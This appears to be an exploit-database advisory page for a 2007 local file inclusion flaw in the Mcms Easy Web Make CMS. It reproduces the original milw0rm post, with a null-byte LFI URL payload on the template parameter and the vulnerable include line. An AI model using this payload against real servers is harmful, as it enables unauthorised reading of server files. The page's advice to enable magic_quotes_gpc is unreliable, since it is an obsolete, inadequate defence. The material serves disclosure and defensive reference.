Mcms Easy Web Make - Local File Inclusion

vendor:

Easy Web Make

by:

MhZ91

5.5

CVSS

MEDIUM

Local File Inclusion

931

CWE

Product Name: Easy Web Make

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Mcms Easy Web Make – Local File Inclusion

The exploit allows an attacker to include local files on the server by manipulating the template parameter in the URL. The vulnerability can be exploited if the magic_quotes_gpc setting is turned off.

Mitigation:

To mitigate this vulnerability, ensure that magic_quotes_gpc setting is turned on in the server configuration.

Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------
Http://www.inj3ct-it.org     Staff[at]inj3ct-it[dot]org 
---------------------------------------------------------------
  Local File Inclusion
---------------------------------------------------------------
# Author: MhZ91
# Title: Mcms Easy Web Make - Local File Inclusion
# Download: http://sourceforge.net/projects/easywebmake/
# Bug: Local File Inclusion
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
Only If magic_quotes_gpc is Off
Exploit: http://[site]/modules/cms/index.php?template=[LFI]%00
Vuln Code: include"includes/$template/template.config.php";
---------------------------------------------------------------

# milw0rm.com [2007-12-11]